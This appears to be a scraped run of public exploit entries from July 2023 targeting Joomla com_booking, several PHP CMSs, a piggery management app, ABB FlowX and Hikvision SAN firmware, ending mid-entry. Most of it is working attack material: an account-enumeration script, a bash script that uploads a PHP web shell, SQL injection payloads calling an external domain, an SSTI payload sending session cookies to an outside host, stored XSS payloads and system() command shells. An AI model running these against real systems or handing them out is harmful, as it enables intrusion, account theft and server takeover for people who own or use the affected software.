
-
Joomla! com_booking component 2.4.9 - Information Leak (Account enumeration)
# Exploit Title: Joomla! com_booking component 2.4.9 - Information Leak (Account enumeration) # Google Dork: inurl:"index.php?option=com_booking" # Date: 07/12/2023 # Exploit Author: qw3rTyTy # Vendor Homepage: http://www.artio.net/ # Software Link: http://www.artio.net/downloads/joomla/book-it/book-it-2-free/download # Version: 2.4.9 # Tested on: Slackware/Nginx/Joomla! 3.10.11 # ## # File: site/booking.php # # <?php # [...] #18 include_once (JPATH_COMPONENT_ADMINISTRATOR . DS . 'booking.php'); # [...] # # File: admin/booking.php # # <?php # [...] #104 if (class_exists(($classname = AImporter::controller()))) { #105 $controller = new $classname(); #106 /* @var $controller JController */ #107 $controller->execute(JRequest::getVar('task')); #108 $controller->redirect(); #109 } # [...] # # File: admin/controllers/customer.php # # <?php # [...] #240 function getUserData() { #241 $user = JFactory::getUser(JRequest::getInt('id')); #242 $data = array('name' => $user->name, 'username' => $user->username, 'email' => $user->email); #243 die(json_encode($data)); #244 } # [...] # # A following GET request is equivalent to doing a query like 'SELECT name, username, email FROM abcde_users WHERE id=123'. # # curl -X GET http://target/joomla/index.php?option=com_booking&controller=customer&task=getUserData&id=123 # # So, an attacker can easily enumerate all accounts by bruteforcing. 
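# ##
import argparse
import urllib.parse
import requests
from sys import exit
from time import sleep

# The vulnerable task. In the excerpt above, the customer controller's
# getUserData() is reached through the public site entry point and performs
# no authentication or ACL check before returning name/username/email for
# whatever id is supplied.
_TASK_PATH = "/index.php?option=com_booking&controller=customer&task=getUserData&id="


def enumerateAccounts(options):
    """Walk user ids upward and print every account record the target discloses.

    ``options.url`` is the Joomla base URL (with or without a trailing slash;
    the original glued "/index.php" onto it and produced "//index.php" when a
    slash was already there). Optional attributes, all defaulted so the
    original argparse namespace still works:

    - ``max_id``: highest id to try (default 10000). The original loop only
      stopped on a non-200 reply, but a record with a null ``name`` still
      comes back with status 200 for ids that do not exist, so it never
      terminated.
    - ``delay``: seconds to sleep between requests (default 0); ``sleep`` was
      imported but never used.
    - ``timeout``: per-request timeout in seconds (default 10); without one a
      stalled target blocks the scan forever.

    Returns the list of decoded JSON records whose ``name`` was not null.
    Stops early - printing why - on a non-200 status, a non-JSON body (an error
    page or a patched component) or a transport error.
    """
    base = options.url.rstrip("/") + _TASK_PATH
    max_id = getattr(options, "max_id", 10000)
    delay = getattr(options, "delay", 0.0)
    timeout = getattr(options, "timeout", 10.0)
    found = []
    for user_id in range(1, max_id + 1):
        try:
            response = requests.get(base + str(user_id), timeout=timeout)
        except requests.exceptions.RequestException as ex:
            print(ex)
            break
        if response.status_code != 200:
            break
        try:
            record = response.json()
        except ValueError:
            # requests raises a ValueError subclass on bad JSON; its own
            # JSONDecodeError attribute only exists in newer releases, so
            # catching it by that name crashed on older installs.
            print("Non-JSON response for id {}; stopping.".format(user_id))
            break
        # Non-existent ids come back as a record with a null name.
        if isinstance(record, dict) and record.get("name") is not None:
            print(record)
            found.append(record)
        if delay:
            sleep(delay)
    return found


def _valid_base_url(url):
    """Return True when *url* has an http/https scheme and a host part.

    Prints the parser error and returns False when urlparse rejects the value.
    """
    try:
        parts = urllib.parse.urlparse(url)
    except ValueError as ex:
        print(ex)
        return False
    # The original tested startswith("http") (which also let e.g. "httpx"
    # through, and made the separate "https" test dead code); an exact match
    # is what the check meant.
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def main():
    """Parse the command line, validate the URL and run the enumeration."""
    p = argparse.ArgumentParser()
    p.add_argument("-u", "--url", type=str, required=True)
    p.add_argument("--max-id", dest="max_id", type=int, default=10000,
                   help="highest user id to try (default 10000)")
    p.add_argument("--delay", type=float, default=0.0,
                   help="seconds to wait between requests (default 0)")
    p.add_argument("--timeout", type=float, default=10.0,
                   help="per-request timeout in seconds (default 10)")
    parsed = p.parse_args()
    if not _valid_base_url(parsed.url):
        print("Improper URL given.")
        exit(1)
    enumerateAccounts(parsed)


if __name__ == "__main__":
    main()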
-
Online Piggery Management System v1.0 - unauthenticated file upload vulnerability
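#!/bin/bash
# Exploit Title: Online Piggery Management System v1.0 - unauthenticated file upload vulnerability
# Date: July 12 2023
# Exploit Author: 1337kid
# Software Link: https://www.sourcecodester.com/php/11814/online-pig-management-system-basic-free-version.html
# Version: 1.0
# Tested on: Ubuntu
# CVE : CVE-2023-37629
#
# chmod +x exploit.sh
# ./exploit.sh web_url
# ./exploit.sh http://127.0.0.1:8080/

echo " _____ _____ ___ __ ___ ____ ________ __ ___ ___ "
echo " / __\\ \\ / / __|_|_ ) \\_ )__ /__|__ /__ / /|_ ) _ \\"
echo " | (__ \\ V /| _|___/ / () / / |_ \\___|_ \\ / / _ \\/ /\\_, /"
echo " \\___| \\_/ |___| /___\\__/___|___/ |___//_/\\___/___|/_/ "
echo " @1337kid"
echo

if [[ -z "$1" ]]; then
    echo "No URL specified!"
    exit 1
fi

# Strip any trailing slash once. The original built "$base_url/add-pig.php"
# but "$base_url"uploadfolder/..., so it only worked when the URL was given
# with a trailing slash (as in the usage example) - and then the upload URL
# contained "//".
base_url="${1%/}"

# Print the HTTP status code of a HEAD request to "$1" ("000" when the
# connection fails). curl -w is more robust than parsing the status line and
# never yields an empty string, which made the original's [[ -eq ]] blow up.
http_status() {
    curl -s -o /dev/null -I -w '%{http_code}' "$1"
}

unauth_file_upload() {
    # CVE-2023-37629 - File upload vuln: add-pig.php accepts the "pigphoto"
    # upload without authentication and the PoC relies on the file being
    # served back from uploadfolder/ under its original name and extension.
    echo "Generating shell.php"
    #===========
    cat > shell.php << EOF
<?php system(\$_GET['cmd']); ?>
EOF
    #===========
    echo "done"
    curl -s -F pigphoto=@shell.php -F submit=pwned "$base_url/add-pig.php" > /dev/null
    # A HEAD request still executes the PHP, so this both verifies the upload
    # and runs "id" on the target.
    req=$(http_status "$base_url/uploadfolder/shell.php?cmd=id")
    if [[ "$req" == "200" ]]; then
        # This is an unauthenticated web shell: record the location so it is
        # removed from the target when the engagement ends.
        echo "Shell uploaded to ${base_url}/uploadfolder/shell.php"
    else
        echo "Failed to upload a shell"
    fi
    # Do not leave the local copy of the shell behind in the working directory.
    rm -f shell.php
}

req=$(http_status "$base_url")
if [[ "$req" == "200" ]]; then
    unauth_file_upload
else
    echo "Error"
    echo "Status Code: $req"
fi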
-
Vaidya-Mitra 1.0 - Multiple SQLi
## Title: Vaidya-Mitra 1.0 - Multiple SQLi ## Author: nu11secur1ty ## Date: 07.12.2023 ## Vendor: https://mayurik.com/ ## Software: free: https://www.sourcecodester.com/php/16720/free-hospital-management-system-small-practices.html, https://mayurik.com/source-code/P5890/best-hospital-management-system-in-php ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The `useremail` parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+' was submitted in the useremail parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker easily can steal all information from this system, like login credentials, phone numbers and etc. STATUS: HIGH Vulnerability [+]Payload: ```mysql --- Parameter: useremail (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: useremail=mayuri.infospace@gmail.com'+(select load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+'' RLIKE (SELECT (CASE WHEN (5532=5532) THEN 0x6d61797572692e696e666f737061636540676d61696c2e636f6d+(select load_file(0x5c5c5c5c6c726730667377767533773131677039727237656b33623734796172796c6d637030686e3762772e6f6173746966792e636f6d5c5c6d6576))+'' ELSE 0x28 END)) AND 'tsyu'='tsyu&userpassword=rootadmin Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: useremail=mayuri.infospace@gmail.com'+(select load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+'' AND (SELECT 3518 FROM(SELECT COUNT(*),CONCAT(0x716a766a71,(SELECT (ELT(3518=3518,1))),0x71626a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 
'gHln'='gHln&userpassword=rootadmin Type: time-based blind Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP) Payload: useremail=mayuri.infospace@gmail.com'+(select load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+'' OR (SELECT 4396 FROM (SELECT(SLEEP(3)))iEbq) AND 'ZWBa'='ZWBa&userpassword=rootadmin --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/Vaidya-Mitra-1.0) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2023/07/vaidya-mitra-10-multiple-sqli.html) ## Time spend: 00:27:00
-
CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template Injection (SSTI)
#Exploit Title: CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template Injection (SSTI) #Application: CmsMadeSimple #Version: v2.2.17 #Bugs: SSTI #Technology: PHP #Vendor URL: https://www.cmsmadesimple.org/ #Software Link: https://www.cmsmadesimple.org/downloads/cmsms #Date of found: 13-07-2023 #Author: Mirabbas Ağalarov #Tested on: Linux 2. Technical Details & POC ======================================== Steps: 1. Login to test user account 2. Go to Content Manager 3. Add New Content 4. set as ''' {$smarty.version} {{7*7}} {$smarty.now} {$smarty.template} <img src=YOU-SERVER/{$smarty.cookies.CMSSESSID852a6e69ca02}> <img src=YOU-SERVER/{$smarty.cookies.34a3083b62a225efa0bc6b5b43335d226264c2c1}> <img src=YOU_SERVER/{$smarty.cookies.__c}> ''' to conten_en section. 5.If any user visit to page, Hacker hijack all cookie payload: %3Cp%3E%7B%24smarty.version%7D+%7B%7B7*7%7D%7D+%7B%24smarty.now%7D+%7B%24smarty.template%7D+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.CMSSESSID852a6e69ca02%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.34a3083b62a225efa0bc6b5b43335d226264c2c1%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.__c%7D%22+%2F%3E%3C%2Fp%3E POC Request POST /admin/moduleinterface.php?mact=CMSContentManager,m1_,admin_editcontent,0&;__c=1c2c31a1c1bff4819cd&;m1_content_id=81&showtemplate=false HTTP/1.1 Host: localhost Content-Length: 988 sec-ch-ua: Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 sec-ch-ua-platform: "" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/ Accept-Encoding: gzip, deflate 
Accept-Language: en-US,en;q=0.9 Cookie: CMSSESSID852a6e69ca02=bq83g023otkn4s745acdnvbnu4; 34a3083b62a225efa0bc6b5b43335d226264c2c1=1e91865ac5c59e34f8dc1ddb6fd168a61246751d%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoiYWRtaW4iLCJlZmZfdWlkIjoyLCJlZmZfdXNlcm5hbWUiOiJ0ZXN0IiwiaGFzaCI6IiQyeSQxMCRDQlwvWEIyNEpsWmhJNjhKQ29LcWplZXgyOUVXRDRGN2E1MTNIdUo2c3VXMUd1V3NKRTBNcEMifQ%3D%3D; __c=1c2c31a1c1bff4819cd Connection: close mact=CMSContentManager%2Cm1_%2Cadmin_editcontent%2C0&__c=1c2c31a1c1bff4819cd&m1_content_id=81&m1_active_tab=&m1_content_type=content&title=test&content_en=%3Cp%3E%7B%24smarty.version%7D+%7B%7B7*7%7D%7D+%7B%24smarty.now%7D+%7B%24smarty.template%7D+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.CMSSESSID852a6e69ca02%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.34a3083b62a225efa0bc6b5b43335d226264c2c1%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.__c%7D%22+%2F%3E%3C%2Fp%3E&menutext=test&parent_id=-1&showinmenu=0&showinmenu=1&titleattribute=&accesskey=&tabindex=&target=---&metadata=&pagedata=&design_id=2&template_id=10&alias=test&active=0&active=1&secure=0&cachable=0&cachable=1&image=&thumbnail=&extra1=&extra2=&extra3=&wantschildren=0&wantschildren=1&searchable=0&searchable=1&disable_wysiwyg=0&ownerid=1&additional_editors=&m1_ajax=1&m1_apply=1 Poc Video: https://youtu.be/zq3u3jRpfqM
-
Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)
#Exploit Title: Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS) #Application: Backdrop Cms #Version: v1.25.1 #Bugs: Stored Xss #Technology: PHP #Vendor URL: https://backdropcms.org/ #Software Link: https://github.com/backdrop/backdrop/releases/download/1.25.1/backdrop.zip #Date of found: 12-07-2023 #Author: Mirabbas Ağalarov #Tested on: Linux 2. Technical Details & POC ======================================== 1. login to account 2. go to http://localhost/backdrop/?q=admin/config/system/site-information 3. upload svg file """ <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> """ 4. go to svg file (http://localhost/backdrop/files/malas_2.svg) Request POST /backdrop/?q=admin/config/system/site-information HTTP/1.1 Host: localhost Content-Length: 2116 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVXWRsHHM3TVjALpg User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/backdrop/?q=admin/config/system/site-information Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: SESS31b3aee8377692ae3f36f0cf7fe0e752=ZuJtSS2iu5SvcKAFtpK8zPAxrnmFebJ1q26hXhAh__E Connection: close ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; 
name="site_name" My Backdrop Site ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_slogan" ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_mail" admin@admin.com ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="files[site_logo_upload]"; filename="malas.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.location); </script> </svg> ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_logo_path" ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="files[site_favicon_upload]"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_favicon_path" core/misc/favicon.ico ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_frontpage" home ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_403" ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="site_404" ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="form_build_id" form-PnR6AFEKCB5hAWH3pDT2J0kkZswH0Rdm0qbOFGqNj-Q ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="form_token" siOWtyEEFVg7neDMTYPHVZ2D3D5U60S38l_cRHbnW40 ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="form_id" system_site_information_settings ------WebKitFormBoundaryVXWRsHHM3TVjALpg Content-Disposition: form-data; name="op" Save configuration ------WebKitForm
-
Blackcat Cms v1.4 - Stored XSS
Exploit Title: Blackcat Cms v1.4 - Stored XSS
Application: blackcat Cms
Version: v1.4
Bugs: Stored XSS
Technology: PHP
Vendor URL: https://blackcat-cms.org/
Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
Date found: 13.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC
========================================
Precondition: steps 1-2 use the authenticated backend page editor, so exploitation needs an account that can edit pages; the payload is stored and then runs for anyone who views the page.
steps:
1. login to account
2. go to pages (http://localhost/BlackCatCMS-1.4/upload/backend/pages/modify.php?page_id=1)
3. set as <img src=x onerror=alert(4)> (the write-up does not name the field; presumably the page content editor)
4. Visit http://localhost/BlackCatCMS-1.4/upload/page/welcome.php?preview=1 - the alert fires, showing the markup was saved and rendered unsanitised
-
ABB FlowX v4.00 - Exposure of Sensitive Information
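#!/usr/bin/python
# Exploit Title: ABB FlowX v4.00 - Exposure of Sensitive Information
# Date: 2023-03-31
# Exploit Author: Paul Smith
# Vendor Homepage: https://new.abb.com/products/measurement-products/flow-computers/spirit-it-flow-x-series
# Version: ABB Flow-X all versions before V4.00
# Tested on: Kali Linux
# CVE: CVE-2023-1258
import sys
import re
from bs4 import BeautifulSoup as BS
import lxml  # noqa: F401 - backend for the "xml" parser used in dump_users()
import requests

# One audit entry per <log> element; group(1) is the account name.
_LOGIN_RE = re.compile(r'User (.*?) logged in')

# Set the request parameter. The original indexed sys.argv unconditionally and
# died with an IndexError instead of a usage message; the global is kept so
# callers that relied on dump_users() reading it still work.
url = sys.argv[1] if len(sys.argv) > 1 else None


def dump_users(target=None):
    """Fetch the log export and print every "User X logged in" entry.

    *target* is the URL of the device's log export (the write-up does not spell
    out the path; the original took it verbatim from argv[1]). It defaults to
    the module-level ``url``. The request is unauthenticated - that is the
    information-exposure issue - and each entry reveals a valid account name.

    Prints every matching line (duplicates included, as before) and returns
    the distinct user names in first-seen order. Exits with status 1 after
    printing the status, headers and body on any non-200 reply.
    """
    target = url if target is None else target
    # A timeout so an unreachable device does not hang the script forever.
    response = requests.get(target, timeout=30)
    # Check for HTTP codes other than 200
    if response.status_code != 200:
        print('Status:', response.status_code, 'Headers:', response.headers, 'Error Response:', response.text)
        sys.exit(1)
    # Decode the xml response and pull the login lines out of the <log> elements
    soup = BS(response.text, features="xml")
    users = []
    for log in soup.find_all("log"):
        match = _LOGIN_RE.search(str(log))
        if match:
            print(match.group(0))
            if match.group(1) not in users:
                users.append(match.group(1))
    return users


def main():
    """Validate the command line and run the dump."""
    if len(sys.argv) != 2:
        print("Usage: {} <url-of-log-export>".format(sys.argv[0]))
        sys.exit(2)
    dump_users(sys.argv[1])


if __name__ == '__main__':
    main()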
-
CmsMadeSimple v2.2.17 - Remote Code Execution (RCE)
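#Exploit Title: CmsMadeSimple v2.2.17 - Remote Code Execution (RCE)
#Application: CmsMadeSimple
#Version: v2.2.17
#Bugs: Remote Code Execution(RCE)
#Technology: PHP
#Vendor URL: https://www.cmsmadesimple.org/
#Software Link: https://www.cmsmadesimple.org/downloads/cmsms
#Date of found: 12-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linux
import os
import sys
import requests

# Base URL of the target. Defaults to the original PoC's localhost but can be
# overridden through the environment so the script is not welded to one host.
BASE = os.environ.get("CMSMS_BASE", "http://localhost")
login_url = BASE + '/admin/login.php'
upload_url = BASE + '/admin/moduleinterface.php'


def _login(session, username, password):
    """Authenticate *session* against the admin panel; return True on success.

    The original treated any HTTP 200 as a successful login, but a rejected
    login re-renders the form with the same status, so the check proved
    nothing and the script then crashed with a KeyError on the ``__c`` cookie.
    That cookie is what the upload request needs, so its presence is the
    meaningful success signal.
    """
    login_data = {
        'username': username,
        'password': password,
        'loginsubmit': 'Submit'
    }
    session.post(login_url, data=login_data)
    return '__c' in session.cookies


def _upload(session, file_path):
    """Upload *file_path* through the FileManager module; return True on HTTP 200.

    The file handle is closed after the request instead of being leaked.
    """
    with open(file_path, 'rb') as fh:
        files = {
            'm1_files[]': fh
        }
        data = {
            'mact': 'FileManager,m1_,upload,0',
            '__c': session.cookies['__c'],
            'disable_buffer': '1'
        }
        response = session.post(upload_url, files=files, data=data)
    return response.status_code == 200


def main():
    """Prompt for credentials and a .phar file, upload it and print the output.

    Requires a valid admin-panel account (this is authenticated RCE). The PoC
    relies on a ``.phar`` extension getting past the FileManager upload filter
    where ``.php`` would not; whether the fetched file actually executes then
    depends on the target's web server handing ``.phar`` to the PHP engine -
    NOTE: confirm that on the target before relying on it.
    """
    username = input('username = ')
    password = input('password = ')
    file_path = input("please phar file name but file must same directory with python file and file content : <?php echo system('cat /etc/passwd') ?> : ")
    # phar file content: <?php echo system('cat /etc/passwd') ?>
    session = requests.Session()
    if not _login(session, username, password):
        print('Login promlem.')
        sys.exit(1)
    print('Login account')
    if not _upload(session, file_path):
        print('file not upload')
        sys.exit(1)
    print('file upload')
    # The upload lands in uploads/ under its own name, so only the basename
    # belongs in the URL (the original glued the whole path on).
    rce_url = f"{BASE}/uploads/{os.path.basename(file_path)}"
    rce = requests.get(rce_url)
    print(rce.text)


if __name__ == "__main__":
    main()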
-
Statamic 4.7.0 - File-Inclusion
## Title: Statamic 4.7.0 - File-Inclusion
## Author: nu11secur1ty
## Date: 07.13.2023
## Vendor: https://statamic.com/
## Software: https://demo.statamic.com/
## Reference: https://portswigger.net/web-security/file-upload
## Description:
Statamic 4.7.0 accepts an uploaded HTML file and serves it back to visitors. An attacker can upload a malicious HTML file and share its URL with other users of the site; as the PoC relies on, the file is rendered from the application's origin, so the script inside it runs there - the example below simply reads `document.cookie`, i.e. the session token - and can go on to act as the victim. Despite the title, this is an unrestricted file upload leading to stored cross-site scripting, not a file-inclusion (LFI/RFI) flaw: no server-side code is included.
## Status: HIGH Vulnerability
[+]Exploit:
```html
<html>
<script>
alert(document.cookie);
</script>
</html>
```
## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/statamic/2023/statamic-4.7.0)
## Proof and Exploit [href](https://www.nu11secur1ty.com/2023/07/statamic-470-file-inclusion-unsanitized.html)
## Time spent: 01:10:00
-
CmsMadeSimple v2.2.17 - Stored Cross-Site Scripting (XSS)
#Exploit Title: CmsMadeSimple v2.2.17 - Stored Cross-Site Scripting (XSS) #Application: CmsMadeSimple #Version: v2.2.17 #Bugs: Stored Xss #Technology: PHP #Vendor URL: https://www.cmsmadesimple.org/ #Software Link: https://www.cmsmadesimple.org/downloads/cmsms #Date of found: 12-07-2023 #Author: Mirabbas Ağalarov #Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. Login to account 2. Go to Content Manager 3. Add New Content 4. Type as '<img src=x onerror=alert(document.cookie)>' to metadata section payload: <img src=x onerror=alert(document.cookie)> 5. Submit Content 6. Visit Content (http://localhost/index.php?page=test) Request: POST /admin/moduleinterface.php?mact=CMSContentManager,m1_,admin_editcontent,0&;__c=5c64b42fb42c1d6bba6&showtemplate=false HTTP/1.1 Host: localhost Content-Length: 584 sec-ch-ua: Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 sec-ch-ua-platform: "" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: CMSSESSID852a6e69ca02=g13p5ucajc0v5tker6ifdcaso5; 34a3083b62a225efa0bc6b5b43335d226264c2c1=24f612918e7b1c1e085bed5cab82f2a786f45d5c%3A%3AeyJ1aWQiOjEsInVzZXJuYW1lIjoiYWRtaW4iLCJlZmZfdWlkIjpudWxsLCJlZmZfdXNlcm5hbWUiOm51bGwsImhhc2giOiIkMnkkMTAkLndYMkFFZnc4WTJlcWhhQVJ2LndZT1FVY09hTzMzeVlNYzVDU1V5NnFRQkxkeXJZNUozSTYifQ%3D%3D; __c=5c64b42fb42c1d6bba6 Connection: close 
mact=CMSContentManager%2Cm1_%2Cadmin_editcontent%2C0&__c=5c64b42fb42c1d6bba6&m1_content_id=0&m1_active_tab=&m1_content_type=content&title=test&content_en=%3Cp%3Etest%3C%2Fp%3E&menutext=&parent_id=-1&showinmenu=0&showinmenu=1&titleattribute=&accesskey=&tabindex=&target=---&metadata=%3Cimg+src%3Dx+onerror%3Dalert(document.cookie)%3E&pagedata=&design_id=2&template_id=10&alias=&active=0&active=1&secure=0&cachable=0&cachable=1&image=&thumbnail=&extra1=&extra2=&extra3=&wantschildren=0&wantschildren=1&searchable=0&searchable=1&disable_wysiwyg=0&additional_editors=&m1_ajax=1&m1_apply=1
-
Blackcat Cms v1.4 - Remote Code Execution (RCE)
Exploit Title: Blackcat Cms v1.4 - Remote Code Execution (RCE) Application: blackcat Cms Version: v1.4 Bugs: RCE Technology: PHP Vendor URL: https://blackcat-cms.org/ Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS Date of found: 13.07.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. login to account as admin 2. go to admin-tools => jquery plugin (http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr) 3. upload zip file but this zip file must contains poc.php poc.php file contents <?php $a=$_GET['code']; echo system($a);?> 4.Go to http://localhost/BlackCatCMS-1.4/upload/modules/lib_jquery/plugins/poc/poc.php?code=cat%20/etc/passwd Poc request POST /BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr HTTP/1.1 Host: localhost Content-Length: 577 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBRByJwW3CUSHOcBT User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: cat7288sessionid=7uv7f4kj7hm9q6jnd6m9luq0ti Connection: close ------WebKitFormBoundaryBRByJwW3CUSHOcBT Content-Disposition: form-data; name="upload" 1 ------WebKitFormBoundaryBRByJwW3CUSHOcBT Content-Disposition: form-data; name="userfile"; filename="poc.zip" Content-Type: application/zip PKvalsdalsfapoc.php<?php $a=$_GET['code']; 
echo system($a); ?> blabalaboalpoc.php blablabla ------WebKitFormBoundaryBRByJwW3CUSHOcBT Content-Disposition: form-data; name="submit" Upload ------WebKitFormBoundaryBRByJwW3CUSHOcBT--
-
Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution
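# Exploit Title: Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution
# Date: 16 July 2023
# Exploit Author: Thurein Soe
# CVE : CVE-2022-28171
# Vendor Homepage: https://www.hikvision.com
# Software Link: N/A
# Reference Link: https://cve.report/CVE-2022-28171
# Version: Ds-a71024 Firmware, Ds-a71024 Firmware Ds-a71048r-cvs Firmware Ds-a71048 Firmware Ds-a71072r Firmware Ds-a71072r Firmware Ds-a72024 Firmware Ds-a72024 Firmware Ds-a72048r-cvs Firmware Ds-a72072r Firmware Ds-a80316s Firmware Ds-a80624s Firmware Ds-a81016s Firmware Ds-a82024d Firmware Ds-a71048r-cvs Ds-a71024 Ds-a71048 Ds-a71072r Ds-a80624s Ds-a82024d Ds-a80316s Ds-a81016s
'''
Vendor Description:
Hikvision is a world-leading surveillance manufacturer and supplier of video surveillance and Internet of Things (IoT) equipment for civilian and military purposes.

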